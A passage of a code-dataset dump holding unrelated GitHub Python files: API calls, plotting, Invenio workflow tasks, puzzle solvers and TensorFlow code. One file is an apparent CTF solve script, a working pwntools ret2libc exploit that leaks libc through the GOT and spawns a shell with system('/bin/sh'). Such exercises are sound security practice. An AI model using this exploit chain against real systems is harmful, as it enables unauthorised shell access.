data\n\nimport requests\n\nURL = \"http://api.open-notify.org/iss-now.json\"\n\nresponse = requests.get(url=URL)\ndata = response.json()\n\nlongitude = data[\"iss_position\"][\"longitude\"]\nlatitude = data[\"iss_position\"][\"latitude\"]\n\niss_position = (longitude, latitude)\nprint(iss_position)\n","repo_name":"narcisabadea/100-days-of-code-python","sub_path":"Day33/Exercise 1 - API calls.py","file_name":"Exercise 1 - API calls.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26693836810","text":"import matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\n#import numpy as np\r\n\r\n# use ggplot style for more sophisticated visuals\r\nplt.style.use('ggplot')\r\nmpl.rcParams['toolbar'] = 'None'\r\n\r\ndef live_plotter(x_vec,y1_data,line1,y1_data_avg,line1_avg,y2_data,line2,y2_data_avg,line2_avg,identifier='',pause_time=0.1):\r\n \r\n if line1==[]:\r\n \r\n # this is the call to matplotlib that allows dynamic plotting\r\n plt.ion()\r\n# fig = plt.figure(figsize=(15,8))\r\n fig, (ax, ax2) = plt.subplots(2)\r\n\r\n ax.set_title('Landing Page')\r\n ax.set_xticks([],[])\r\n ax.set_ylabel('Milliseconds', fontsize='large')\r\n ax.set_ylim([0, 1000])\r\n# ax.grid(color='grey', linestyle='-', linewidth=0.25, alpha=0.5)\r\n \r\n ax2.set_title('Personal Action Plan')\r\n ax2.set_xticks([],[])\r\n ax2.set_ylabel('Milliseconds', fontsize='large') \r\n ax2.set_ylim([0, 1000])\r\n \r\n # create variables for the linse so we can later update them\r\n line1, = ax.plot(x_vec, y1_data, marker='o', color='blue', linewidth=1, markersize = 3)\r\n line1_avg, = ax.plot(x_vec, y1_data_avg, color='magenta', linewidth=0.5) \r\n \r\n line2, = ax2.plot(x_vec, y2_data, marker='o', color='green', linewidth=1, markersize = 3)\r\n line2_avg, = ax2.plot(x_vec, y2_data_avg, color='tomato', linewidth=0.5) \r\n \r\n plt.show() \r\n \r\n # after the figure, axis, and line are created, we only need to update the y-data\r\n line1.set_ydata(y1_data)\r\n line1_avg.set_ydata(y1_data_avg)\r\n line2.set_ydata(y2_data)\r\n line2_avg.set_ydata(y2_data_avg) \r\n \r\n #adjust limits if new data goes beyond bounds\r\n# if np.min(y1_data)<=line1.axes.get_ylim()[0] or np.max(y1_data)>=line1.axes.get_ylim()[1]:\r\n# plt.ylim([np.min(y1_data)-np.std(y1_data),np.max(y1_data)+np.std(y1_data)])\r\n# \r\n# if np.min(y2_data)<=line2.axes.get_ylim()[0] or np.max(y2_data)>=line2.axes.get_ylim()[1]:\r\n# plt.ylim([np.min(y2_data)-np.std(y2_data),np.max(y2_data)+np.std(y2_data)]) \r\n \r\n # this pauses the data so the figure/axis can catch up - the amount of pause can be altered above\r\n plt.pause(pause_time)\r\n \r\n # return line so we can update it again in the next iteration\r\n return line1, line1_avg, line2, line2_avg","repo_name":"petebchamp/PythonLearn","sub_path":"LogReader_Python/pylive.py","file_name":"pylive.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24714841617","text":"import glob\nimport os\nimport traceback\n\nfrom functools import wraps\n\nfrom six import callable\n\n\ndef approve_record(obj, eng):\n \"\"\"Will add the approval widget to the record.\n\n The workflow need to be halted to use the\n action in the holdingpen.\n :param obj: Bibworkflow Object to process\n :param eng: BibWorkflowEngine processing the object\n \"\"\"\n try:\n eng.halt(action=\"approval\",\n msg='Record needs approval')\n except KeyError:\n # Log the error\n obj.extra_data[\"_error_msg\"] = 'Could not assign action'\n\n\ndef was_approved(obj, eng):\n \"\"\"Check if the record was approved.\"\"\"\n extra_data = obj.get_extra_data()\n return extra_data.get(\"approved\", False)\n\n\ndef convert_record_to_bibfield(model=None):\n \"\"\"Convert to record from MARCXML.\n\n Expecting MARCXML, this task converts it using the current configuration to a\n SmartJSON object.\n\n :param obj: Bibworkflow Object to process\n :param eng: BibWorkflowEngine processing the object\n \"\"\"\n @wraps(convert_record_to_bibfield)\n def _convert_record_to_bibfield(obj, eng):\n from invenio.modules.workflows.utils import convert_marcxml_to_bibfield\n obj.data = convert_marcxml_to_bibfield(obj.data, model)\n eng.log.info(\"Field conversion succeeded\")\n return _convert_record_to_bibfield\n\n\ndef get_files_list(path, parameter):\n \"\"\"Function returning the list of file in a directory.\"\"\"\n @wraps(get_files_list)\n def _get_files_list(obj, eng):\n if callable(parameter):\n unknown = parameter\n while callable(unknown):\n unknown = unknown(obj, eng)\n\n else:\n unknown = parameter\n result = glob.glob1(path, unknown)\n for i in range(0, len(result)):\n result[i] = path + os.sep + result[i]\n return result\n\n return _get_files_list\n\n\ndef set_obj_extra_data_key(key, value):\n \"\"\"Task setting the value of an object extra data key.\"\"\"\n @wraps(set_obj_extra_data_key)\n def _set_obj_extra_data_key(obj, eng):\n my_value = value\n my_key = key\n if callable(my_value):\n while callable(my_value):\n my_value = my_value(obj, eng)\n if callable(my_key):\n while callable(my_key):\n my_key = my_key(obj, eng)\n obj.extra_data[str(my_key)] = my_value\n\n return _set_obj_extra_data_key\n\n\ndef get_obj_extra_data_key(name):\n \"\"\"Task returning the value of an object extra data key.\"\"\"\n @wraps(get_obj_extra_data_key)\n def _get_obj_extra_data_key(obj, eng):\n return obj.extra_data[name]\n\n return _get_obj_extra_data_key\n\n\ndef get_eng_extra_data_key(name):\n \"\"\"Task returning the value of an engine extra data key.\"\"\"\n @wraps(get_eng_extra_data_key)\n def _get_eng_extra_data_key(obj, eng):\n return eng.extra_data[name]\n\n return _get_eng_extra_data_key\n\n\ndef get_data(obj, eng):\n \"\"\"Task returning data of the object.\"\"\"\n return obj.data\n\n\ndef convert_record(stylesheet=\"oaidc2marcxml.xsl\"):\n \"\"\"Convert the object data to marcxml using the given stylesheet.\n\n :param stylesheet: which stylesheet to use\n :return: function to convert record\n :raise WorkflowError:\n \"\"\"\n @wraps(convert_record)\n def _convert_record(obj, eng):\n from invenio.modules.workflows.errors import WorkflowError\n from invenio.legacy.bibconvert.xslt_engine import convert\n\n eng.log.info(\"Starting conversion using %s stylesheet\" %\n (stylesheet,))\n\n if not obj.data:\n obj.log.error(\"Not valid conversion data!\")\n raise WorkflowError(\"Error: conversion data missing\",\n id_workflow=eng.uuid,\n id_object=obj.id)\n\n try:\n obj.data = convert(obj.data, stylesheet)\n except Exception as e:\n msg = \"Could not convert record: %s\\n%s\" % \\\n (str(e), traceback.format_exc())\n raise WorkflowError(\"Error: %s\" % (msg,),\n id_workflow=eng.uuid,\n id_object=obj.id)\n\n _convert_record.description = 'Convert record'\n return _convert_record\n\n\ndef update_last_update(repository_list):\n \"\"\"Perform the update of the update date.\"\"\"\n from invenio.legacy.oaiharvest.dblayer import update_lastrun\n\n @wraps(update_last_update)\n def _update_last_update(obj, eng):\n if \"_should_last_run_be_update\" in obj.extra_data:\n if obj.extra_data[\"_should_last_run_be_update\"]:\n repository_list_to_process = repository_list\n if not isinstance(repository_list_to_process, list):\n if callable(repository_list_to_process):\n while callable(repository_list_to_process):\n repository_list_to_process = repository_list_to_process(\n obj, eng)\n else:\n repository_list_to_process = [\n repository_list_to_process]\n for repository in repository_list_to_process:\n update_lastrun(repository[\"id\"])\n\n return _update_last_update\n\n\ndef quick_match_record(obj, eng):\n \"\"\"Retrieve the record Id from a record.\n\n Retrieve the record Id from a record by using tag 001 or SYSNO or OAI ID or\n DOI tag. opt_mod is the desired mode.\n\n 001 fields even in the insert mode\n\n :param obj: Bibworkflow Object to process\n :param eng: BibWorkflowEngine processing the object\n \"\"\"\n from invenio.legacy.bibupload.engine import (find_record_from_recid,\n find_record_from_sysno,\n find_records_from_extoaiid,\n find_record_from_oaiid,\n find_record_from_doi)\n from invenio.modules.records.api import Record\n\n identifier_function_to_check = {'recid': find_record_from_recid,\n 'system_number': find_record_from_sysno,\n 'oaiid': find_record_from_oaiid,\n 'system_control_number': find_records_from_extoaiid,\n 'doi': find_record_from_doi}\n\n record = Record(obj.data.dumps())\n try:\n identifiers = record.persistent_identifiers\n except Exception as e:\n # if anything goes wrong, assume we need to get it manually.\n eng.log.error(\"Problem with getting identifiers: %s\\n%s\"\n % (str(e), traceback.format_exc()))\n identifiers = []\n\n obj.extra_data[\"persistent_ids\"] = identifiers\n\n identifier_dict = {}\n for name, value in identifiers:\n value_dict = {}\n for dic in value:\n value_dict.update(dic)\n identifier_dict[name] = value_dict\n\n if \"recid\" in identifier_dict:\n # If there is a recid, we are good, right?\n obj.extra_data[\"persistent_ids\"][\"recid\"] = identifier_dict[\"recid\"]\n return True\n\n # So if there is no explicit recid key, then maybe we can find the record\n # using any of the other stable identifiers defined.\n found_recid = False\n for name, func in identifier_function_to_check.iteritems():\n if name in identifier_dict:\n if name in identifier_dict[name]:\n # To get {\"doi\": {\"doi\": val}}\n found_recid = func(identifier_dict[name][name])\n elif \"value\" in identifier_dict[name]:\n # To get {\"doi\": {\"value\": val}}\n found_recid = func(identifier_dict[name][\"value\"])\n\n if found_recid:\n break\n\n if found_recid:\n obj.extra_data[\"persistent_ids\"][\"recid\"] = found_recid\n return True\n return False\n\n\ndef upload_record(mode=\"ir\"):\n \"\"\"Perform the upload step.\"\"\"\n @wraps(upload_record)\n def _upload_record(obj, eng):\n from invenio.legacy.bibsched.bibtask import task_low_level_submission\n eng.log_info(\"Saving data to temporary file for upload\")\n filename = obj.save_to_file()\n params = [\"-%s\" % (mode,), filename]\n task_id = task_low_level_submission(\"bibupload\", \"bibworkflow\",\n *tuple(params))\n eng.log_info(\"Submitted task #%s\" % (task_id,))\n\n return _upload_record\n","repo_name":"chokribr/invenio","sub_path":"invenio/modules/workflows/tasks/marcxml_tasks.py","file_name":"marcxml_tasks.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74872893905","text":"# this is a dice making module\n# max is the max of the range\n# it will run the function roll(max) numOfDice times\n# ---------------------------------->\n\nfrom random import randint\n\ndef roll(max):\n r = randint(1, max)\n print(r)\n return r\n\ndef roll_a_bunch(max, numOfDice):\n rolls = []\n for i in range(numOfDice):\n rolls.append(roll(max))\n\n return rolls\n\ndef roll_distro(max, numOfDice=4):\n # roll a bunch of die or number of times\n rolls = roll_a_bunch(max, numOfDice)\n\n distribution = {}\n\n # count what is rolled\n # if key in dict: return dict[key] else: return default\n for each in rolls:\n currentCount = distribution.get(each, 0)\n print(\"Current count of\", each, \":\", currentCount)\n currentCount += 1\n distribution[each] = currentCount\n\n output = \"\"\n for roll in distribution:\n output += \"Number \" + str(roll) + \" was rolled \" + str(distribution[roll]) + \" times\\n\"\n\n print(output)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"PDXDevCampJuly/michael_devCamp","sub_path":"python/dice/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"464722875","text":"from typing import List\n\n\ndef allPathsSourceTarget(graph: List[List[int]]) -> List[List[int]]:\n ret = []\n path = []\n def dfs(i):\n if i == len(graph) - 1:\n ret.append(path[:])\n return\n for to in graph[i]:\n path.append(to)\n dfs(to)\n path.pop()\n \n path.append(0)\n dfs(0)\n return ret\n\n\nif __name__ == \"__main__\":\n graph = [[1, 2], [3], [3], []]\n result = allPathsSourceTarget(graph)\n correct_result = [[0, 1, 3], [0, 2, 3]]\n print(\"Expected:\")\n print(correct_result)\n print(\"Output:\")\n print(result)\n","repo_name":"giwankim/algo","sub_path":"leetcode/797-all-paths-from-source-to-target/all_paths.py","file_name":"all_paths.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21744177689","text":"#!/usr/bin/python3\n# Author: Hack.You\nfrom pwn import *\nimport warnings\n\n# Allows you to switch between local/GDB/remote from terminal\ndef start(argv=[], *a, **kw):\n if args.GDB: # Set GDBscript below\n return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)\n elif args.REMOTE: # ('server', 'port')\n return remote(sys.argv[1], sys.argv[2], *a, **kw)\n else: # Run locally\n return process([exe] + argv, *a, **kw)\n\n\n# Specify GDB script here (breakpoints etc)\ngdbscript = '''\ninit-pwndbg\ncontinue\n'''.format(**locals())\n\n# Binary filename\nexe = './karma'\n# This will automatically get context arch, bits, os etc\nelf = context.binary = ELF(exe, checksec=False)\n# Change logging level to help with debugging (error/warning/info/debug)\ncontext.log_level = 'info'\nwarnings.filterwarnings(\"ignore\", category=BytesWarning, message=\"Text is not bytes; assuming ASCII, no guarantees.\")\n\n# ===========================================================\n# EXPLOIT GOES HERE\n# ===========================================================\n\n# Start program\nio = start()\n\n# Load libc library (identified version from server - https://libc.blukat.me)\n# libc = ELF('libc6_2.35-0ubuntu3.1_amd64.so')\nlibc = elf.libc\n\noffset = 88\n\npop_rdi = 0x0000000000401196 # pop rdi; ret;\npop_rsi = 0x0000000000401198 # pop rsi; ret; \npop_rdx = 0x000000000040119a # pop rdx; ret; \n\nret = 0x000000000040101a # ret; \n\n\npayload = flat({\n offset: [\n pop_rdi,\n 0x1,\n pop_rsi,\n elf.got['write'],\n pop_rdx,\n 0x20,\n elf.plt['write'],\n elf.symbols['main']\n ]\n})\n\nio.recvuntil('headed.')\nio.sendline('A')\n\n# Leak address\nio.sendline(payload) \nio.recvline()\nio.recvuntil('network?')\nio.recvline()\ngot_write = unpack(io.recv()[:6].ljust(8, b\"\\x00\"))\ninfo(\"got write: %#x\", got_write)\n\n# Calculate libc base\nlibc.address = got_write - libc.symbols['write']\ninfo(\"libc_base: %#x\", libc.address)\n\nsh = next(libc.search(b'/bin/sh\\x00'))\nsystem = libc.symbols['system']\ninfo('/bin/sh: %#x', sh)\ninfo('system: %#x', system)\n\n# Payload to spawn shell\npayload = flat({\n offset: [\n pop_rdi, # System(\"/bin/sh\")\n sh,\n ret,\n system\n ]\n})\n\nio.sendline('A')\nio.sendline(payload)\n\nio.interactive()\n","repo_name":"markuched13/markuched13.github.io","sub_path":"solvescript/bicdefcon_23/karma/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34646862225","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 17 17:18:46 2015\n\n@author: nelmntrx\n\"\"\"\n\n'''MISCELLANEOUS FUNCTIONS for looping'''\n\nimport numpy as np\nfrom sympy.combinatorics.permutations import Permutation\nimport networkx as nx\nimport string as st\nimport itertools\nimport matplotlib.pyplot as plt\n\n\n\ndef return_string(array): #connects a list of letters for cube_maker\n# baliktaran = iter(array)\n return ''.join(array)\n\n\ndef path(string): #returns a graph with nodes and edges that is exactly the same in a pocket cube\n pocketcube = nx.Graph()\n for letter in string:\n pocketcube.add_node(letter)\n edges = [(string[0],string[22]),(string[0],string[1]), (string[0],string[2]),\n (string[0],string[4]), (string[1],string[23]), (string[1],string[9]),\n (string[1],string[3]),(string[2],string[3]),(string[3],string[8]),\n (string[3],string[7]),(string[2],string[5]),(string[2],string[6]),\n (string[4],string[22]),(string[4],string[10]),(string[5],string[11]),\n (string[5],string[6]),(string[6],string[7]),(string[6],string[12]),\n (string[7],string[8]),(string[7],string[13]),(string[8],string[9]),\n (string[8],string[14]),(string[9],string[15]),(string[9],string[23]),\n (string[10],string[20]),(string[10],string[11]),(string[10],string[18]),\n (string[11],string[16]),(string[11],string[12]),(string[12],string[13]),\n (string[12],string[16]),(string[13],string[14]),\n (string[13],string[17]),(string[14],string[15]),(string[14],string[17]),\n (string[15],string[21]),(string[15],string[19]),(string[16],string[18]),\n (string[16],string[17]),(string[17],string[19]),(string[19],string[21]),\n (string[18],string[20]),(string[20],string[21]),(string[20],string[22]),\n (string[21],string[23]),(string[22],string[23]), (string[18], string[19])]\n pocketcube.add_edges_from(edges)\n \n\n return nx.shortest_path_length(pocketcube)\n\ndef show(string):\n pocketcube = nx.Graph()\n for letter in string:\n pocketcube.add_node(letter)\n edges = [(string[0],string[22]),(string[0],string[1]), (string[0],string[3]),\n (string[0],string[4]), (string[1],string[23]), (string[1],string[9]),\n (string[1],string[2]),(string[2],string[3]),(string[2],string[8]),\n (string[2],string[7]),(string[3],string[5]),(string[3],string[6]),\n (string[4],string[22]),(string[4],string[10]),(string[5],string[11]),\n (string[5],string[6]),(string[6],string[7]),(string[6],string[12]),\n (string[7],string[8]),(string[7],string[13]),(string[8],string[9]),\n (string[8],string[14]),(string[9],string[15]),(string[9],string[23]),\n (string[10],string[10]),(string[10],string[11]),(string[10],string[18]),\n (string[11],string[16]),(string[11],string[12]),(string[12],string[13]),\n (string[12],string[13]),(string[12],string[16]),(string[13],string[14]),\n (string[13],string[17]),(string[14],string[15]),(string[14],string[17]),\n (string[15],string[21]),(string[15],string[19]),(string[16],string[18]),\n (string[16],string[17]),(string[17],string[19]),(string[19],string[21]),\n (string[18],string[20]),(string[20],string[21]),(string[20],string[22]),\n (string[21],string[23]),(string[22],string[23]), (string[18], string[19])]\n pocketcube.add_edges_from(edges)\n\n labels = {}\n for node in pocketcube.nodes():\n labels[node] = node\n\n pos = nx.random_layout(pocketcube)\n nx.draw(pocketcube, with_labels=False)\n nx.draw_networkx_labels(pocketcube, pos, labels, node_size=20, node_color='r' )\n plt.show()\n return \"This is state: %s\" %string\n \n \ndef network(string):\n pocketcube = nx.Graph()\n for letterA in string:\n pocketcube.add_node(letterA)\n listahan = path(string)[letterA]\n for letterB in listahan:\n if letterA != letterB:\n pocketcube.add_edge(letterA, letterB, weight = listahan[letterB])\n return pocketcube\n\n#solved_state = 'ABCDEFGHIJKLMNOPQRSTUVWX'\n#\n#graph = network(solved_state)\n##for edge in graph.edges():\n## print edge\n## print nx.from_edgelist(graph)\n#print nx.algebraic_connectivity(graph)\n#print nx.average_clustering(graph)\n#print nx.transitivity(graph)\n#print nx.diameter(graph)\n\n\n\n\n# label = 'network({})'.format(string)\n# return nx.write_dot(pocketcube, label) \n \n \n \n# labels = {}\n# for node in pocketcube.nodes():\n# labels[node] = node\n# edge_labels = dict([((u,v), d['weight']) for u,v,d in pocketcube.edges(data=True)])\n# \n# pos = nx.spring_layout(pocketcube)\n# nx.draw(pocketcube, with_labels=False,node_size=10)\n# nx.draw_networkx_labels(pocketcube, pos, font_size=13,font_family='sans-serif')\n# nx.draw_networkx_edge_labels(pocketcube, pos,edge_labels=edge_labels)\n# \n# \n# pylab.show()\n#state = 'ABCDEFGHIJKLMNOPQRSTUVWX'\n#graph = network(state)\n#label = 'network({})'.format(state)\n#print nx.write_dot(graph,label)","repo_name":"WynnImproso/old_codes","sub_path":"way way back/CODES/Pocket Cube/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14062898912","text":"subject_number = 7\ncard_pub = 12320657\ndoor_pub = 9659666\n\ndef transform(val, subj):\n return (val*subj) % 20201227\n\ndef get_loops(pub_key):\n val = 1\n loops = 0\n while val != pub_key:\n loops += 1\n val = transform(val, subject_number)\n return loops\n\ndef get_both_loops():\n card_loops = get_loops(card_pub)\n door_loops = get_loops(door_pub)\n return card_loops, door_loops\n\ndef get_key():\n card_loops, door_loops = get_both_loops()\n val = 1\n while card_loops:\n val = transform(val, door_pub)\n card_loops -= 1\n card_key = val\n val = 1\n while door_loops:\n val = transform(val, card_pub)\n door_loops -= 1\n door_key = val\n return card_key, door_key\n\nif __name__ == '__main__':\n print(get_key())","repo_name":"jefallon/adventofcode2020","sub_path":"Day25a.py","file_name":"Day25a.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27269443155","text":"# Built-in\nimport argparse\nfrom os import path\nimport random\nrandom.seed(7123)\n\n# Libs\nimport tensorflow as tf\nimport numpy as np\nimport pickle\n\n# Custom\nimport utils\nimport constants\n\n# Globals\nINPUT_LAYER = '{}/input_images:0'\n\nEXTRACT_CONFIG = {\n # model_name -> (dim_size, target_layer, input_dimension)\n 'netnet_sf.pb' : [\n ('netnet_sf.pb/MobilenetV1/Predictions/Reshape:0', 29, 160),\n ('netnet_sf.pb/MobilenetV1/Logits/Dropout_1b/Identity:0', 512, 160)\n ],\n 'structured_test.pb' : [\n ('structured_test.pb/MobilenetV1/Logits/SpatialSqueeze:0', 100, 224)\n ],\n 'sf_structured_progress.pb' : [\n ('sf_structured_progress.pb/MobilenetV1/Logits/SpatialSqueeze:0', 256, 224)\n ],\n 'stanford_products_val_removed.pb' : [\n ('stanford_products_val_removed.pb/MobilenetV1/Logits/SpatialSqueeze:0', 256, 224)\n ]\n}\n\n# Helpers\ndef saveFeatures(features, labels, model_path, input_path, labels_dict):\n data = ({'features' : features, 'labels' : labels}, labels_dict)\n outfile_name = \"{}_{}_data.pkl\".format(path.basename(model_path.strip('/')), path.basename(input_path.strip('/')))\n outfile_name = path.join('..', 'embeddings', outfile_name)\n with open(outfile_name, 'wb') as outf:\n pickle.dump(data, outf, protocol=pickle.HIGHEST_PROTOCOL)\n print(\"Saved {} features with dimension {} and {} labels.\".format(features.shape[0], features.shape[1], labels.shape[0]))\n print(\"Destination: {}\".format(outfile_name))\n\ndef selectTarget(model_path):\n model = path.basename(model_path.rstrip('/'))\n options = EXTRACT_CONFIG[model]\n print(\"Select one of the following options [0-{}]:\".format(len(options)-1))\n for i, o in enumerate(options):\n print(\" [{}] Layer '{}' with dimension {}\".format(i, *o))\n while True:\n selection = input('Selection: ')\n try:\n selection = int(selection)\n break\n except ValueError:\n print('Invalid selection, please try again.')\n print(\"\")\n return options[selection]\n\n\n# Main\n\ndef runInference(model_path, input_paths, data_type, args = None):\n model_name = path.basename(model_path)\n target, dim_size, image_size = selectTarget(model_path)\n dataset_iterator, labels_dict = utils.loadImageDataset(input_paths, data_type, image_size)\n\n with tf.Session() as sess:\n # Load model\n utils.loadModel(model_path, path.basename(model_path), print_layers=False)\n # Get layer outputs\n features_node = sess.graph.get_tensor_by_name(target)\n # Init storage arrays\n features = np.empty((0, dim_size), np.float32)\n labels = np.empty((0,), np.int32)\n n_processed = 0\n # Eval loop\n while True:\n try:\n # Evaluate batch\n try:\n X, y = sess.run(dataset_iterator.get_next())\n X /= 255.0\n except tf.errors.InternalError:\n continue\n feed_dict = {INPUT_LAYER.format(model_name) : X}\n target_output = sess.run(features_node, feed_dict = feed_dict)\n target_output = np.squeeze(target_output) \n # Stack outputs\n features = np.vstack((features, target_output))\n labels = np.hstack((labels, y)) \n # Logging\n n_processed += constants.BATCH_SIZE\n if n_processed % 10*constants.BATCH_SIZE == 0: \n print(\"Processed {} records.\".format(n_processed))\n except tf.errors.OutOfRangeError:\n break\n print(\"Completed extracting features. \\n\")\n return features, labels, labels_dict\n\ndef setupArgs():\n def validDataType(data_type):\n if data_type not in ['tfr', 'img', 'jpeg', 'jpg', 'png']: raise ValueError()\n return data_type\n parser = argparse.ArgumentParser(description='Extract activations from trained models.')\n parser.add_argument('model_path', help='path to model file')\n parser.add_argument('data_type', help='one of {img, jpeg, jpg, tfr}', type=validDataType)\n parser.add_argument('input_path', help='path to image files')\n args = parser.parse_args()\n print(\"\")\n return args\n\ndef main():\n args = setupArgs()\n features, labels, labels_dict = runInference(args.model_path, args.input_path, args.data_type, args)\n saveFeatures(features, labels, args.model_path, args.input_path, labels_dict)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zachmaurer/fast-novelty-detection","sub_path":"extract_features.py","file_name":"extract_features.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"23447063296","text":"import sys\nfrom collections import deque\n\ninput = lambda : sys.stdin.readline().rstrip()\n\nbridge = deque([0,0])\nN, W, L = map(int, input().split()) # 다리를 건너는 트럭의 수 / 다리의 길이 / 다리의 최대 하중\nbridge = deque([0]*W)\ntrucks = deque(list(map(int, input().split())))\n\nnow_weight = 0\nanswer = 0\nwhile trucks :\n answer += 1\n # 이동\n now_weight -= bridge.popleft()\n # 들어갈 수 있는지 확인\n if now_weight + trucks[0] <= L :\n now_weight += trucks[0]\n bridge.append(trucks.popleft())\n else :\n bridge.append(0)\nprint(answer+W)","repo_name":"JoungMinJu/PyCodingTest","sub_path":"Reis/que/BOJ_13335.py","file_name":"BOJ_13335.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27170235812","text":"import tensorflow as tf\nimport numpy as np\nimport sys\n\n#sys.setrecursionlimit(1000000)\n\n\n\"\"\"\n残差网络\n\"\"\"\n\nnMoudel=1#hourglass 中residual 模块的数量\nLRNKernel=11\n\ndef batch_norm(input_images):\n # Batch Normalization批归一化\n # ((x-mean)/var)*gamma+beta\n #输入通道维数\n #parms_shape=[input_images.get_shape()[-1]]\n #parms_shape=tf.shape(input_images)[-1]\n ##print(parms_shape)\n #offset\n beta=tf.Variable(tf.constant(0.0,tf.float32),name='beta',dtype=tf.float32)\n #scale\n gamma=tf.Variable(tf.constant(1.0,tf.float32),name='gamma',dtype=tf.float32)\n #为每个通道计算均值标准差\n mean,variance=tf.nn.moments(input_images, [0, 1, 2], name='moments')\n y=tf.nn.batch_normalization(input_images,mean,variance,beta,gamma,0.001)\n y.set_shape(input_images.get_shape())\n\n return y\n\n\ndef batch_norm_relu(x):\n r_bn=batch_norm(x)\n r_bnr=tf.nn.relu(r_bn,name='relu')\n return r_bnr\n\n\ndef conv2(input_images,filter_size,stride,out_filters,div_p=2,padding='SAME',weight=None,activate=tf.nn.relu):\n #将权重分模块做卷积,2 2分\n in_filters=input_images.get_shape().as_list()[-1]\n #卷积核初始化\n\n part_results=[]\n num_part=div_p*div_p\n shape_input=input_images.get_shape().as_list()\n part_even_w=shape_input[1]//2+filter_size-1\n part_even_h=shape_input[2]//2+filter_size-1\n part_odd_w=shape_input[1]//2\n part_odd_h=shape_input[2]//2\n region_list=[\n [0,part_even_w,0,part_even_h],\n [part_odd_w,shape_input[1],0,part_even_h],\n [0,part_even_w,part_odd_h,shape_input[2]],\n [part_odd_w,shape_input[1],part_odd_h,shape_input[2]]\n ]\n # print(region_list)\n for i in range(num_part):\n # print(i)\n biase = tf.Variable(tf.constant(0.0, shape=[out_filters]), dtype=tf.float32, name='biases'+str(i))\n if weight:\n _weights=weight\n else:\n _weights=tf.Variable(tf.contrib.layers.xavier_initializer(uniform=False)\n ([filter_size,filter_size,in_filters,out_filters])\n ,name = 'weight1'+str(i))\n\n\n part_input = input_images[:, region_list[i][0]:region_list[i][1], region_list[i][2]:region_list[i][3], :]\n # print(part_input.get_shape().as_list())\n r_conv = tf.nn.conv2d(part_input, _weights, strides=stride, padding=padding)\n r_biases = tf.add(r_conv, biase)\n r_act = activate(r_biases)\n # print('result',r_act.get_shape().as_list())\n part_results.append(r_act)\n _01_result=tf.concat((part_results[0],part_results[1]),axis=1)\n _23_result=tf.concat((part_results[2],part_results[3]),axis=1)\n _result=tf.concat((_01_result,_23_result),axis=2)\n # print('01',_01_result.get_shape().as_list(),'\\n',\n # '23',_23_result.get_shape().as_list(),'\\n',\n # 'result',_result.get_shape().as_list())\n relu_result=tf.nn.relu(_result,name='relu')\n return relu_result\n\n\ndef down_sampling(x,ksize=2,strides=2,padding='VALID'):\n\n #下采样\n #ksize: A 1-D int Tensor of 4 elements.\n #strides: A 1-D int Tensor of 4 elements\n return tf.nn.max_pool(x,[1,ksize,ksize,1],[1,strides,strides,1],padding=padding,name='max_pool')\n\n\ndef full_connect(inp,out_filters):\n #input, filter, strides, padding, use_cudnn_on_gpu=True, data_format=\"NHWC\", name=None\n kernel_w=inp.get_shape().as_list()[1]\n kernel_h=inp.get_shape().as_list()[2]\n\n _weights = tf.Variable(tf.contrib.layers.xavier_initializer(uniform=False)\n ([kernel_w, kernel_h, inp.get_shape().as_list()[-1], out_filters])\n , name='weight1')\n conv=tf.nn.conv2d(inp,_weights,[1,1,1,1],padding='VALID')\n biases = tf.Variable(tf.constant(0.0, shape=[out_filters], dtype=tf.float32), name='biases')\n re_conv2 = tf.add(conv, biases)\n #sum_conv=tf.reduce_sum(conv,[0,1,2])\n return re_conv2\n\ndef orid_conv2(inp,filter_size,out_filters,strides,padding='VALID'):\n #普通的卷积\n weights=tf.Variable(tf.contrib.layers.xavier_initializer(uniform=False)(\n [filter_size,filter_size,inp.get_shape().as_list()[-1],out_filters]\n ),name='weights')\n biases=tf.Variable(tf.constant(0.0,shape=[out_filters],dtype=tf.float32),name='biases')\n conv=tf.nn.conv2d(inp,weights,[1,strides,strides,1],padding)\n re_conv2=tf.add(conv,biases)\n relu_result=tf.nn.relu(re_conv2,name='relu')\n return relu_result\n\n\ndef local_share_weight_conv2(input_images,filter_size,stride,out_filters,div_w=2,div_h=2,padding='VALID',weight=None,activate=tf.nn.relu):\n #将权重分模块做卷积\n in_filters=input_images.get_shape().as_list()[-1]\n #卷积核初始化\n\n part_results=[]\n num_part=div_w*div_h\n shape_input=input_images.get_shape().as_list()\n #每一部分的宽度和高度计算\n w_part_middle=shape_input[1]//div_w+filter_size-1\n h_part_middle=shape_input[2]//div_h+filter_size-1\n norm_part_width=shape_input[1]//div_w\n norm_part_height=shape_input[2]//div_h\n region_list=[]\n\n begin_w = 0\n begin_h = 0\n\n for part in range(num_part):\n change_line=False\n\n if (part+1)%div_w==0:\n part_width=shape_input[1]\n change_line=True\n else:\n 